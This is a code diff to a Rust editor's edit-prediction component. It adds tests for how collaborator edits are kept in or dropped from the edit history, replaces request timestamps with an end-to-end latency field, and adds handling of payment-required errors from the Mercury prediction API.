+ let position = snapshot1.anchor_before(language::Point::new(1, 3));
+
+ ep_store.update(cx, |ep_store, cx| {
+ ep_store.register_project(&project, cx);
+ ep_store.register_buffer(&buffer1, &project, cx);
+ ep_store.refresh_prediction_from_buffer(project.clone(), buffer1.clone(), position, cx);
+ });
+
+ let (request, respond_tx) = requests.predict.next().await.unwrap();
+ respond_tx
+ .send(model_response(
+ &request,
+ indoc! {r"
+ --- a/root/1.txt
+ +++ b/root/1.txt
+ @@ ... @@
+ Hello!
+ -How
+ +How are you?
+ Bye
+ "},
+ ))
+ .unwrap();
+ cx.run_until_parked();
+
+ ep_store.update(cx, |ep_store, cx| {
+ ep_store.reject_current_prediction(EditPredictionRejectReason::Discarded, &project, cx);
+ });
+
+ let _ = multi_workspace.update(cx, |multi_workspace, window, cx| {
+ multi_workspace.workspace().update(cx, |workspace, cx| {
+ workspace.start_following(CollaboratorId::Agent, window, cx);
+ });
+ });
+ cx.run_until_parked();
+
+ let diagnostic = lsp::Diagnostic {
+ range: lsp::Range::new(lsp::Position::new(1, 1), lsp::Position::new(1, 5)),
+ severity: Some(lsp::DiagnosticSeverity::ERROR),
+ message: "Sentence is incomplete".to_string(),
+ ..Default::default()
+ };
+
+ project.update(cx, |project, cx| {
+ project.lsp_store().update(cx, |lsp_store, cx| {
+ lsp_store
+ .update_diagnostics(
+ LanguageServerId(0),
+ lsp::PublishDiagnosticsParams {
+ uri: lsp::Uri::from_file_path(path!("/root/2.txt")).unwrap(),
+ diagnostics: vec![diagnostic.clone()],
+ version: None,
+ },
+ None,
+ language::DiagnosticSourceKind::Pushed,
+ &[],
+ cx,
+ )
+ .unwrap();
+ });
+ });
+
+ cx.run_until_parked();
+ assert_no_predict_request_ready(&mut requests.predict);
+
+ let _ = multi_workspace.update(cx, |multi_workspace, window, cx| {
+ multi_workspace.workspace().update(cx, |workspace, cx| {
+ workspace.unfollow(CollaboratorId::Agent, window, cx);
+ });
+ });
+ cx.run_until_parked();
+
+ project.update(cx, |project, cx| {
+ project.lsp_store().update(cx, |lsp_store, cx| {
+ lsp_store
+ .update_diagnostics(
+ LanguageServerId(0),
+ lsp::PublishDiagnosticsParams {
+ uri: lsp::Uri::from_file_path(path!("/root/2.txt")).unwrap(),
+ diagnostics: vec![diagnostic],
+ version: None,
+ },
+ None,
+ language::DiagnosticSourceKind::Pushed,
+ &[],
+ cx,
+ )
+ .unwrap();
+ });
+ });
+
+ let (request, respond_tx) = requests.predict.next().await.unwrap();
+ respond_tx
+ .send(model_response(
+ &request,
+ indoc! {r#"
+ --- a/root/2.txt
+ +++ b/root/2.txt
+ @@ ... @@
+ Hola!
+ -Como
+ +Como estas?
+ Adios
+ "#},
+ ))
+ .unwrap();
+ cx.run_until_parked();
+
+ ep_store.update(cx, |ep_store, cx| {
+ let prediction = ep_store
+ .prediction_at(&buffer1, None, &project, cx)
+ .unwrap();
+ assert_matches!(
+ prediction,
+ BufferEditPrediction::Jump { prediction } if prediction.snapshot.file().unwrap().full_path(cx) == Path::new(path!("root/2.txt"))
+ );
+ });
+}
+
#[gpui::test]
async fn test_simple_request(cx: &mut TestAppContext) {
let (ep_store, mut requests) = init_test_with_fake_client(cx);
@@ -369,6 +539,12 @@ async fn test_edit_history_getter_pause_splits_last_event(cx: &mut TestAppContex
ep_store.edit_history_for_project(&project, cx)
});
assert_eq!(events.len(), 2);
+
+ let first_total_edit_range = buffer.read_with(cx, |buffer, _| {
+ events[0].total_edit_range.to_point(&buffer.snapshot())
+ });
+ assert_eq!(first_total_edit_range, Point::new(1, 0)..Point::new(1, 3));
+
let zeta_prompt::Event::BufferChange { diff, .. } = events[0].event.as_ref();
assert_eq!(
diff.as_str(),
@@ -381,6 +557,11 @@ async fn test_edit_history_getter_pause_splits_last_event(cx: &mut TestAppContex
"}
);
+ let second_total_edit_range = buffer.read_with(cx, |buffer, _| {
+ events[1].total_edit_range.to_point(&buffer.snapshot())
+ });
+ assert_eq!(second_total_edit_range, Point::new(1, 3)..Point::new(1, 13));
+
let zeta_prompt::Event::BufferChange { diff, .. } = events[1].event.as_ref();
assert_eq!(
diff.as_str(),
@@ -597,6 +778,315 @@ fn render_events_with_predicted(events: &[StoredEvent]) -> Vec<String> {
.collect()
}
+fn make_collaborator_replica(
+ buffer: &Entity<Buffer>,
+ cx: &mut TestAppContext,
+) -> (Entity<Buffer>, clock::Global) {
+ let (state, version) =
+ buffer.read_with(cx, |buffer, _cx| (buffer.to_proto(_cx), buffer.version()));
+ let collaborator = cx.new(|_cx| {
+ Buffer::from_proto(ReplicaId::new(1), Capability::ReadWrite, state, None).unwrap()
+ });
+ (collaborator, version)
+}
+
+async fn apply_collaborator_edit(
+ collaborator: &Entity<Buffer>,
+ buffer: &Entity<Buffer>,
+ since_version: &mut clock::Global,
+ edit_range: Range<usize>,
+ new_text: &str,
+ cx: &mut TestAppContext,
+) {
+ collaborator.update(cx, |collaborator, cx| {
+ collaborator.edit([(edit_range, new_text)], None, cx);
+ });
+
+ let serialize_task = collaborator.read_with(cx, |collaborator, cx| {
+ collaborator.serialize_ops(Some(since_version.clone()), cx)
+ });
+ let ops = serialize_task.await;
+ *since_version = collaborator.read_with(cx, |collaborator, _cx| collaborator.version());
+
+ buffer.update(cx, |buffer, cx| {
+ buffer.apply_ops(
+ ops.into_iter()
+ .map(|op| language::proto::deserialize_operation(op).unwrap()),
+ cx,
+ );
+ });
+}
+
+#[gpui::test]
+async fn test_nearby_collaborator_edits_are_kept_in_history(cx: &mut TestAppContext) {
+ let (ep_store, _requests) = init_test_with_fake_client(cx);
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ "/root",
+ json!({
+ "foo.rs": "line 0\nline 1\nline 2\nline 3\nline 4\nline 5\nline 6\nline 7\nline 8\nline 9\nline 10\nline 11\nline 12\nline 13\nline 14\n"
+ }),
+ )
+ .await;
+ let project = Project::test(fs, vec![path!("/root").as_ref()], cx).await;
+
+ let buffer = project
+ .update(cx, |project, cx| {
+ let path = project.find_project_path(path!("root/foo.rs"), cx).unwrap();
+ project.set_active_path(Some(path.clone()), cx);
+ project.open_buffer(path, cx)
+ })
+ .await
+ .unwrap();
+
+ let cursor = buffer.read_with(cx, |buffer, _cx| buffer.anchor_before(Point::new(1, 0)));
+
+ ep_store.update(cx, |ep_store, cx| {
+ ep_store.register_buffer(&buffer, &project, cx);
+ let _ = ep_store.prediction_at(&buffer, Some(cursor), &project, cx);
+ });
+
+ buffer.update(cx, |buffer, cx| {
+ buffer.edit(vec![(0..6, "LOCAL ZERO")], None, cx);
+ });
+
+ let (collaborator, mut collaborator_version) = make_collaborator_replica(&buffer, cx);
+
+ let (line_one_start, line_one_len) = collaborator.read_with(cx, |buffer, _cx| {
+ (Point::new(1, 0).to_offset(buffer), buffer.line_len(1))
+ });
+
+ apply_collaborator_edit(
+ &collaborator,
+ &buffer,
+ &mut collaborator_version,
+ line_one_start..line_one_start + line_one_len as usize,
+ "REMOTE ONE",
+ cx,
+ )
+ .await;
+
+ let events = ep_store.update(cx, |ep_store, cx| {
+ ep_store.edit_history_for_project(&project, cx)
+ });
+
+ assert_eq!(
+ render_events_with_predicted(&events),
+ vec![indoc! {"
+ manual
+ @@ -1,5 +1,5 @@
+ -line 0
+ -line 1
+ +LOCAL ZERO
+ +REMOTE ONE
+ line 2
+ line 3
+ line 4
+ "}]
+ );
+}
+
+#[gpui::test]
+async fn test_distant_collaborator_edits_are_omitted_from_history(cx: &mut TestAppContext) {
+ let (ep_store, _requests) = init_test_with_fake_client(cx);
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ "/root",
+ json!({
+ "foo.rs": (0..1000)
+ .map(|i| format!("line {i}\n"))
+ .collect::<String>()
+ }),
+ )
+ .await;
+ let project = Project::test(fs, vec![path!("/root").as_ref()], cx).await;
+
+ let buffer = project
+ .update(cx, |project, cx| {
+ let path = project.find_project_path(path!("root/foo.rs"), cx).unwrap();
+ project.set_active_path(Some(path.clone()), cx);
+ project.open_buffer(path, cx)
+ })
+ .await
+ .unwrap();
+
+ let cursor = buffer.read_with(cx, |buffer, _cx| buffer.anchor_before(Point::new(1, 0)));
+
+ ep_store.update(cx, |ep_store, cx| {
+ ep_store.register_buffer(&buffer, &project, cx);
+ let _ = ep_store.prediction_at(&buffer, Some(cursor), &project, cx);
+ });
+
+ buffer.update(cx, |buffer, cx| {
+ buffer.edit(vec![(0..6, "LOCAL ZERO")], None, cx);
+ });
+
+ let (collaborator, mut collaborator_version) = make_collaborator_replica(&buffer, cx);
+
+ let far_line_start = buffer.read_with(cx, |buffer, _cx| Point::new(900, 0).to_offset(buffer));
+
+ apply_collaborator_edit(
+ &collaborator,
+ &buffer,
+ &mut collaborator_version,
+ far_line_start..far_line_start + 7,
+ "REMOTE FAR",
+ cx,
+ )
+ .await;
+
+ let events = ep_store.update(cx, |ep_store, cx| {
+ ep_store.edit_history_for_project(&project, cx)
+ });
+
+ assert_eq!(
+ render_events_with_predicted(&events),
+ vec![indoc! {"
+ manual
+ @@ -1,4 +1,4 @@
+ -line 0
+ +LOCAL ZERO
+ line 1
+ line 2
+ line 3
+ "}]
+ );
+}
+
+#[gpui::test]
+async fn test_irrelevant_collaborator_edits_in_different_files_are_omitted_from_history(
+ cx: &mut TestAppContext,
+) {
+ let (ep_store, _requests) = init_test_with_fake_client(cx);
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ "/root",
+ json!({
+ "foo.rs": "line 0\nline 1\nline 2\nline 3\n",
+ "bar.rs": "line 0\nline 1\nline 2\nline 3\n"
+ }),
+ )
+ .await;
+ let project = Project::test(fs, vec![path!("/root").as_ref()], cx).await;
+
+ let foo_buffer = project
+ .update(cx, |project, cx| {
+ let path = project.find_project_path(path!("root/foo.rs"), cx).unwrap();
+ project.set_active_path(Some(path.clone()), cx);
+ project.open_buffer(path, cx)
+ })
+ .await
+ .unwrap();
+ let bar_buffer = project
+ .update(cx, |project, cx| {
+ let path = project.find_project_path(path!("root/bar.rs"), cx).unwrap();
+ project.open_buffer(path, cx)
+ })
+ .await
+ .unwrap();
+
+ let foo_cursor = foo_buffer.read_with(cx, |buffer, _cx| buffer.anchor_before(Point::new(1, 0)));
+
+ ep_store.update(cx, |ep_store, cx| {
+ ep_store.register_buffer(&foo_buffer, &project, cx);
+ ep_store.register_buffer(&bar_buffer, &project, cx);
+ let _ = ep_store.prediction_at(&foo_buffer, Some(foo_cursor), &project, cx);
+ });
+
+ let (bar_collaborator, mut bar_version) = make_collaborator_replica(&bar_buffer, cx);
+
+ apply_collaborator_edit(
+ &bar_collaborator,
+ &bar_buffer,
+ &mut bar_version,
+ 0..6,
+ "REMOTE BAR",
+ cx,
+ )
+ .await;
+
+ let events = ep_store.update(cx, |ep_store, cx| {
+ ep_store.edit_history_for_project(&project, cx)
+ });
+
+ assert!(events.is_empty());
+}
+
+#[gpui::test]
+async fn test_large_edits_are_omitted_from_history(cx: &mut TestAppContext) {
+ let (ep_store, _requests) = init_test_with_fake_client(cx);
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ "/root",
+ json!({
+ "foo.rs": (0..20)
+ .map(|i| format!("line {i}\n"))
+ .collect::<String>()
+ }),
+ )
+ .await;
+ let project = Project::test(fs, vec![path!("/root").as_ref()], cx).await;
+
+ let buffer = project
+ .update(cx, |project, cx| {
+ let path = project.find_project_path(path!("root/foo.rs"), cx).unwrap();
+ project.set_active_path(Some(path.clone()), cx);
+ project.open_buffer(path, cx)
+ })
+ .await
+ .unwrap();
+
+ let cursor = buffer.read_with(cx, |buffer, _cx| buffer.anchor_before(Point::new(1, 0)));
+
+ ep_store.update(cx, |ep_store, cx| {
+ ep_store.register_buffer(&buffer, &project, cx);
+ let _ = ep_store.prediction_at(&buffer, Some(cursor), &project, cx);
+ });
+
+ buffer.update(cx, |buffer, cx| {
+ buffer.edit(vec![(0..6, "LOCAL ZERO")], None, cx);
+ });
+
+ let (collaborator, mut collaborator_version) = make_collaborator_replica(&buffer, cx);
+
+ let (line_three_start, line_three_len) = collaborator.read_with(cx, |buffer, _cx| {
+ (Point::new(3, 0).to_offset(buffer), buffer.line_len(3))
+ });
+ let large_edit = "X".repeat(EDIT_HISTORY_DIFF_SIZE_LIMIT + 1);
+
+ apply_collaborator_edit(
+ &collaborator,
+ &buffer,
+ &mut collaborator_version,
+ line_three_start..line_three_start + line_three_len as usize,
+ &large_edit,
+ cx,
+ )
+ .await;
+
+ buffer.update(cx, |buffer, cx| {
+ let line_seven_start = Point::new(7, 0).to_offset(buffer);
+ let line_seven_end = Point::new(7, 6).to_offset(buffer);
+ buffer.edit(
+ vec![(line_seven_start..line_seven_end, "LOCAL SEVEN")],
+ None,
+ cx,
+ );
+ });
+
+ let events = ep_store.update(cx, |ep_store, cx| {
+ ep_store.edit_history_for_project(&project, cx)
+ });
+
+ let rendered_events = render_events_with_predicted(&events);
+
+ assert_eq!(rendered_events.len(), 2);
+ assert!(rendered_events[0].contains("+LOCAL ZERO"));
+ assert!(!rendered_events[0].contains(&large_edit));
+ assert!(rendered_events[1].contains("+LOCAL SEVEN"));
+ assert!(!rendered_events[1].contains(&large_edit));
+}
+
#[gpui::test]
async fn test_predicted_flag_coalescing(cx: &mut TestAppContext) {
let (ep_store, _requests) = init_test_with_fake_client(cx);
@@ -679,7 +1169,7 @@ async fn test_predicted_flag_coalescing(cx: &mut TestAppContext) {
let end = Point::new(2, 6).to_offset(buffer);
buffer.edit(vec![(offset..end, "LINE TWO")], None, cx);
});
- ep_store.report_changes_for_buffer(&buffer, &project, true, cx);
+ ep_store.report_changes_for_buffer(&buffer, &project, true, true, cx);
});
let events = ep_store.update(cx, |ep_store, cx| {
@@ -721,7 +1211,7 @@ async fn test_predicted_flag_coalescing(cx: &mut TestAppContext) {
let end = Point::new(3, 6).to_offset(buffer);
buffer.edit(vec![(offset..end, "LINE THREE")], None, cx);
});
- ep_store.report_changes_for_buffer(&buffer, &project, true, cx);
+ ep_store.report_changes_for_buffer(&buffer, &project, true, true, cx);
});
let events = ep_store.update(cx, |ep_store, cx| {
@@ -908,6 +1398,7 @@ async fn test_empty_prediction(cx: &mut TestAppContext) {
reason: EditPredictionRejectReason::Empty,
was_shown: false,
model_version: None,
+ e2e_latency_ms: Some(0),
}]
);
}
@@ -969,6 +1460,7 @@ async fn test_interpolated_empty(cx: &mut TestAppContext) {
reason: EditPredictionRejectReason::InterpolatedEmpty,
was_shown: false,
model_version: None,
+ e2e_latency_ms: Some(0),
}]
);
}
@@ -1062,6 +1554,7 @@ async fn test_replace_current(cx: &mut TestAppContext) {
reason: EditPredictionRejectReason::Replaced,
was_shown: false,
model_version: None,
+ e2e_latency_ms: Some(0),
}]
);
}
@@ -1157,6 +1650,7 @@ async fn test_current_preferred(cx: &mut TestAppContext) {
reason: EditPredictionRejectReason::CurrentPreferred,
was_shown: false,
model_version: None,
+ e2e_latency_ms: Some(0),
}]
);
}
@@ -1249,6 +1743,7 @@ async fn test_cancel_earlier_pending_requests(cx: &mut TestAppContext) {
reason: EditPredictionRejectReason::Canceled,
was_shown: false,
model_version: None,
+ e2e_latency_ms: None,
}]
);
}
@@ -1380,12 +1875,16 @@ async fn test_cancel_second_on_third_request(cx: &mut TestAppContext) {
reason: EditPredictionRejectReason::Canceled,
was_shown: false,
model_version: None,
+ e2e_latency_ms: None,
},
EditPredictionRejection {
request_id: first_id,
reason: EditPredictionRejectReason::Replaced,
was_shown: false,
model_version: None,
+ // 2 throttle waits (for 2nd and 3rd requests) elapsed
+ // between this request's start and response.
+ e2e_latency_ms: Some(2 * EditPredictionStore::THROTTLE_TIMEOUT.as_millis()),
}
]
);
@@ -1548,6 +2047,7 @@ async fn test_rejections_flushing(cx: &mut TestAppContext) {
EditPredictionRejectReason::Discarded,
false,
None,
+ None,
cx,
);
ep_store.reject_prediction(
@@ -1555,6 +2055,7 @@ async fn test_rejections_flushing(cx: &mut TestAppContext) {
EditPredictionRejectReason::Canceled,
true,
None,
+ None,
cx,
);
});
@@ -1574,6 +2075,7 @@ async fn test_rejections_flushing(cx: &mut TestAppContext) {
reason: EditPredictionRejectReason::Discarded,
was_shown: false,
model_version: None,
+ e2e_latency_ms: None
}
);
assert_eq!(
@@ -1583,6 +2085,7 @@ async fn test_rejections_flushing(cx: &mut TestAppContext) {
reason: EditPredictionRejectReason::Canceled,
was_shown: true,
model_version: None,
+ e2e_latency_ms: None
}
);
@@ -1594,6 +2097,7 @@ async fn test_rejections_flushing(cx: &mut TestAppContext) {
EditPredictionRejectReason::Discarded,
false,
None,
+ None,
cx,
);
}
@@ -1626,6 +2130,7 @@ async fn test_rejections_flushing(cx: &mut TestAppContext) {
EditPredictionRejectReason::Discarded,
false,
None,
+ None,
cx,
);
});
@@ -1646,6 +2151,7 @@ async fn test_rejections_flushing(cx: &mut TestAppContext) {
EditPredictionRejectReason::Discarded,
false,
None,
+ None,
cx,
);
});
@@ -1855,6 +2361,7 @@ fn empty_response() -> PredictEditsV3Response {
fn prompt_from_request(request: &PredictEditsV3Request) -> String {
zeta_prompt::format_zeta_prompt(&request.input, zeta_prompt::ZetaFormat::default())
+ .expect("default zeta prompt formatting should succeed in edit prediction tests")
}
fn assert_no_predict_request_ready(
@@ -1978,8 +2485,6 @@ async fn test_edit_prediction_basic_interpolation(cx: &mut TestAppContext) {
can_collect_data: false,
repo_url: None,
},
- buffer_snapshotted_at: Instant::now(),
- response_received_at: Instant::now(),
model_version: None,
};
@@ -2419,74 +2924,6 @@ async fn test_unauthenticated_without_custom_url_blocks_prediction_impl(cx: &mut
);
}
-#[gpui::test]
-fn test_compute_diff_between_snapshots(cx: &mut TestAppContext) {
- let buffer = cx.new(|cx| {
- Buffer::local(
- indoc! {"
- zero
- one
- two
- three
- four
- five
- six
- seven
- eight
- nine
- ten
- eleven
- twelve
- thirteen
- fourteen
- fifteen
- sixteen
- seventeen
- eighteen
- nineteen
- twenty
- twenty-one
- twenty-two
- twenty-three
- twenty-four
- "},
- cx,
- )
- });
-
- let old_snapshot = buffer.read_with(cx, |buffer, _| buffer.text_snapshot());
-
- buffer.update(cx, |buffer, cx| {
- let point = Point::new(12, 0);
- buffer.edit([(point..point, "SECOND INSERTION\n")], None, cx);
- let point = Point::new(8, 0);
- buffer.edit([(point..point, "FIRST INSERTION\n")], None, cx);
- });
-
- let new_snapshot = buffer.read_with(cx, |buffer, _| buffer.text_snapshot());
-
- let (diff, _) = compute_diff_between_snapshots(&old_snapshot, &new_snapshot).unwrap();
-
- assert_eq!(
- diff,
- indoc! {"
- @@ -6,10 +6,12 @@
- five
- six
- seven
- +FIRST INSERTION
- eight
- nine
- ten
- eleven
- +SECOND INSERTION
- twelve
- thirteen
- fourteen
- "}
- );
-}
-
#[gpui::test]
async fn test_diagnostic_jump_excludes_collaborator_regions(cx: &mut TestAppContext) {
fn set_collaborator_cursor(buffer: &Entity<Buffer>, row: u32, cx: &mut TestAppContext) {
@@ -2767,6 +3204,7 @@ async fn test_edit_prediction_settled(cx: &mut TestAppContext) {
&snapshot_a,
editable_region_a.clone(),
None,
+ Duration::from_secs(0),
cx,
);
});
@@ -2830,6 +3268,7 @@ async fn test_edit_prediction_settled(cx: &mut TestAppContext) {
&snapshot_b2,
editable_region_b.clone(),
None,
+ Duration::from_secs(0),
cx,
);
});
@@ -26,6 +26,14 @@ pub fn encode_cursor_in_patch(patch: &str, cursor_offset: Option<usize>) -> Stri
let mut line_start_offset = 0usize;
for line in patch.lines() {
+ if matches!(
+ DiffLine::parse(line),
+ DiffLine::Garbage(content)
+ if content.starts_with('#') && content.contains(CURSOR_POSITION_MARKER)
+ ) {
+ continue;
+ }
+
if !result.is_empty() {
result.push('\n');
}
@@ -846,6 +854,31 @@ mod tests {
assert_eq!(results, vec![(clean_patch, None)]);
}
+ #[test]
+ fn test_encode_cursor_in_patch_is_idempotent() {
+ let patch = indoc! {r#"
+ --- a/test.rs
+ +++ b/test.rs
+ @@ -1,2 +1,2 @@
+ -fn old() {}
+ +fn new_name() {}
+ # ^[CURSOR_POSITION]
+ "#};
+
+ let cursor_offset = "fn new_name() {}".find("name").unwrap();
+ let encoded_once = encode_cursor_in_patch(patch, Some(cursor_offset));
+ let encoded_twice = encode_cursor_in_patch(&encoded_once, Some(cursor_offset));
+
+ assert_eq!(encoded_once, encoded_twice);
+ assert_eq!(
+ encoded_once
+ .lines()
+ .filter(|line| line.contains(CURSOR_POSITION_MARKER))
+ .count(),
+ 1
+ );
+ }
+
#[test]
fn test_from_markdown_accepted_prediction_marker() {
let markdown = indoc! {r#"
@@ -19,10 +19,8 @@ struct FimRequestOutput {
request_id: String,
edits: Vec<(std::ops::Range<Anchor>, Arc<str>)>,
snapshot: BufferSnapshot,
- response_received_at: Instant,
inputs: ZetaPromptInput,
buffer: Entity<Buffer>,
- buffer_snapshotted_at: Instant,
}
pub fn request_prediction(
@@ -47,7 +45,7 @@ pub fn request_prediction(
let http_client = cx.http_client();
let cursor_point = position.to_point(&snapshot);
- let buffer_snapshotted_at = Instant::now();
+ let request_start = cx.background_executor().now();
let Some(settings) = (match provider {
settings::EditPredictionProvider::Ollama => settings.ollama.clone(),
@@ -119,7 +117,7 @@ pub fn request_prediction(
log::debug!(
"fim: completion received ({:.2}s)",
- (response_received_at - buffer_snapshotted_at).as_secs_f64()
+ (response_received_at - request_start).as_secs_f64()
);
let completion: Arc<str> = clean_fim_completion(&response_text).into();
@@ -135,10 +133,8 @@ pub fn request_prediction(
request_id,
edits,
snapshot,
- response_received_at,
inputs,
buffer,
- buffer_snapshotted_at,
})
});
@@ -151,10 +147,9 @@ pub fn request_prediction(
&output.snapshot,
output.edits.into(),
None,
- output.buffer_snapshotted_at,
- output.response_received_at,
output.inputs,
None,
+ cx.background_executor().now() - request_start,
cx,
)
.await,
@@ -1,37 +1,47 @@
use crate::{
DebugEvent, EditPredictionFinishedDebugEvent, EditPredictionId, EditPredictionModelInput,
- EditPredictionStartedDebugEvent, open_ai_response::text_from_response,
+ EditPredictionStartedDebugEvent, EditPredictionStore, open_ai_response::text_from_response,
prediction::EditPredictionResult, zeta::compute_edits,
};
use anyhow::{Context as _, Result};
use cloud_llm_client::EditPredictionRejectReason;
use futures::AsyncReadExt as _;
use gpui::{
- App, AppContext as _, Entity, Global, SharedString, Task,
- http_client::{self, AsyncBody, HttpClient, Method},
+ App, AppContext as _, Context, Entity, Global, SharedString, Task,
+ http_client::{self, AsyncBody, HttpClient, Method, StatusCode},
};
use language::{ToOffset, ToPoint as _};
use language_model::{ApiKeyState, EnvVar, env_var};
use release_channel::AppVersion;
-use serde::Serialize;
-use std::{mem, ops::Range, path::Path, sync::Arc, time::Instant};
+use serde::{Deserialize, Serialize};
+use std::{mem, ops::Range, path::Path, sync::Arc};
use zeta_prompt::ZetaPromptInput;
const MERCURY_API_URL: &str = "https://api.inceptionlabs.ai/v1/edit/completions";
pub struct Mercury {
pub api_token: Entity<ApiKeyState>,
+ payment_required_error: bool,
}
impl Mercury {
pub fn new(cx: &mut App) -> Self {
Mercury {
api_token: mercury_api_token(cx),
+ payment_required_error: false,
}
}
+ pub fn has_payment_required_error(&self) -> bool {
+ self.payment_required_error
+ }
+
+ pub fn set_payment_required_error(&mut self, payment_required_error: bool) {
+ self.payment_required_error = payment_required_error;
+ }
+
pub(crate) fn request_prediction(
- &self,
+ &mut self,
EditPredictionModelInput {
buffer,
snapshot,
@@ -41,7 +51,7 @@ impl Mercury {
debug_tx,
..
}: EditPredictionModelInput,
- cx: &mut App,
+ cx: &mut Context<EditPredictionStore>,
) -> Task<Result<Option<EditPredictionResult>>> {
self.api_token.update(cx, |key_state, cx| {
_ = key_state.load_if_needed(MERCURY_CREDENTIALS_URL, |s| s, cx);
@@ -57,7 +67,7 @@ impl Mercury {
let http_client = cx.http_client();
let cursor_point = position.to_point(&snapshot);
- let buffer_snapshotted_at = Instant::now();
+ let request_start = cx.background_executor().now();
let active_buffer = buffer.clone();
let result = cx.background_spawn(async move {
@@ -127,6 +137,7 @@ impl Mercury {
content: open_ai::MessageContent::Plain(prompt),
}],
stream: false,
+ stream_options: None,
max_completion_tokens: None,
stop: vec![],
temperature: None,
@@ -161,8 +172,13 @@ impl Mercury {
.await
.context("Failed to read response body")?;
- let response_received_at = Instant::now();
if !response.status().is_success() {
+ if response.status() == StatusCode::PAYMENT_REQUIRED {
+ anyhow::bail!(MercuryPaymentRequiredError(
+ mercury_payment_required_message(&body),
+ ));
+ }
+
anyhow::bail!(
"Request failed with status: {:?}\nBody: {}",
response.status(),
@@ -206,12 +222,25 @@ impl Mercury {
);
}
- anyhow::Ok((id, edits, snapshot, response_received_at, inputs))
+ anyhow::Ok((id, edits, snapshot, inputs))
});
- cx.spawn(async move |cx| {
- let (id, edits, old_snapshot, response_received_at, inputs) =
- result.await.context("Mercury edit prediction failed")?;
+ cx.spawn(async move |ep_store, cx| {
+ let result = result.await.context("Mercury edit prediction failed");
+
+ let has_payment_required_error = result
+ .as_ref()
+ .err()
+ .is_some_and(is_mercury_payment_required_error);
+
+ ep_store.update(cx, |store, cx| {
+ store
+ .mercury
+ .set_payment_required_error(has_payment_required_error);
+ cx.notify();
+ })?;
+
+ let (id, edits, old_snapshot, inputs) = result?;
anyhow::Ok(Some(
EditPredictionResult::new(
EditPredictionId(id.into()),
@@ -219,10 +248,9 @@ impl Mercury {
&old_snapshot,
edits.into(),
None,
- buffer_snapshotted_at,
- response_received_at,
inputs,
None,
+ cx.background_executor().now() - request_start,
cx,
)
.await,
@@ -315,6 +343,33 @@ fn push_delimited(prompt: &mut String, delimiters: Range<&str>, cb: impl FnOnce(
pub const MERCURY_CREDENTIALS_URL: SharedString =
SharedString::new_static("https://api.inceptionlabs.ai/v1/edit/completions");
pub const MERCURY_CREDENTIALS_USERNAME: &str = "mercury-api-token";
+
+#[derive(Debug, thiserror::Error)]
+#[error("{0}")]
+struct MercuryPaymentRequiredError(SharedString);
+
+#[derive(Deserialize)]
+struct MercuryErrorResponse {
+ error: MercuryErrorMessage,
+}
+
+#[derive(Deserialize)]
+struct MercuryErrorMessage {
+ message: String,
+}
+
+fn is_mercury_payment_required_error(error: &anyhow::Error) -> bool {
+ error
+ .downcast_ref::<MercuryPaymentRequiredError>()
+ .is_some()
+}
+
+fn mercury_payment_required_message(body: &[u8]) -> SharedString {
+ serde_json::from_slice::<MercuryErrorResponse>(body)
+ .map(|response| response.error.message.into())
+ .unwrap_or_else(|_| String::from_utf8_lossy(body).trim().to_string().into())
+}
+
pub static MERCURY_TOKEN_ENV_VAR: std::sync::LazyLock<EnvVar> = env_var!("MERCURY_AI_TOKEN");
struct GlobalMercuryApiKey(Entity<ApiKeyState>);
@@ -1,8 +1,4 @@
-use std::{
- ops::Range,
- sync::Arc,
- time::{Duration, Instant},
-};
+use std::{ops::Range, sync::Arc};
use cloud_llm_client::EditPredictionRejectReason;
use edit_prediction_types::{PredictedCursorPosition, interpolate_edits};
@@ -29,6 +25,7 @@ impl std::fmt::Display for EditPredictionId {
pub struct EditPredictionResult {
pub id: EditPredictionId,
pub prediction: Result<EditPrediction, EditPredictionRejectReason>,
+ pub e2e_latency: std::time::Duration,
}
impl EditPredictionResult {
@@ -38,15 +35,15 @@ impl EditPredictionResult {
edited_buffer_snapshot: &BufferSnapshot,
edits: Arc<[(Range<Anchor>, Arc<str>)]>,
cursor_position: Option<PredictedCursorPosition>,
- buffer_snapshotted_at: Instant,
- response_received_at: Instant,
inputs: ZetaPromptInput,
model_version: Option<String>,
+ e2e_latency: std::time::Duration,
cx: &mut AsyncApp,
) -> Self {
if edits.is_empty() {
return Self {
id,
+ e2e_latency,
prediction: Err(EditPredictionRejectReason::Empty),
};
}
@@ -62,6 +59,7 @@ impl EditPredictionResult {
else {
return Self {
id,
+ e2e_latency,
prediction: Err(EditPredictionRejectReason::InterpolatedEmpty),
};
};
@@ -70,6 +68,7 @@ impl EditPredictionResult {
Self {
id: id.clone(),
+ e2e_latency,
prediction: Ok(EditPrediction {
id,
edits,
@@ -78,8 +77,6 @@ impl EditPredictionResult {
edit_preview,
inputs,
buffer: edited_buffer.clone(),
- buffer_snapshotted_at,
- response_received_at,
model_version,
}),
}
@@ -94,8 +91,6 @@ pub struct EditPrediction {
pub snapshot: BufferSnapshot,
pub edit_preview: EditPreview,
pub buffer: Entity<Buffer>,
- pub buffer_snapshotted_at: Instant,
- pub response_received_at: Instant,
pub inputs: zeta_prompt::ZetaPromptInput,
pub model_version: Option<String>,
}
@@ -111,10 +106,6 @@ impl EditPrediction {
pub fn targets_buffer(&self, buffer: &Buffer) -> bool {
self.snapshot.remote_id() == buffer.remote_id()
}
-
- pub fn latency(&self) -> Duration {
- self.response_received_at - self.buffer_snapshotted_at
- }
}
impl std::fmt::Debug for EditPrediction {
@@ -169,8 +160,6 @@ mod tests {
can_collect_data: false,
repo_url: None,
},
- buffer_snapshotted_at: Instant::now(),
- response_received_at: Instant::now(),
};
cx.update(|cx| {
@@ -21,7 +21,6 @@ use std::{
ops::Range,
path::Path,
sync::Arc,
- time::Instant,
};
const SWEEP_API_URL: &str = "https://autocomplete.sweep.dev/backend/next_edit_autocomplete";
@@ -50,6 +49,7 @@ impl SweepAi {
.sweep
.privacy_mode;
let debug_info = self.debug_info.clone();
+ let request_start = cx.background_executor().now();
self.api_token.update(cx, |key_state, cx| {
_ = key_state.load_if_needed(SWEEP_CREDENTIALS_URL, |s| s, cx);
});
@@ -90,8 +90,6 @@ impl SweepAi {
.take(3)
.collect::<Vec<_>>();
- let buffer_snapshotted_at = Instant::now();
-
let result = cx.background_spawn(async move {
let text = inputs.snapshot.text();
@@ -255,7 +253,6 @@ impl SweepAi {
let mut body = String::new();
response.body_mut().read_to_string(&mut body).await?;
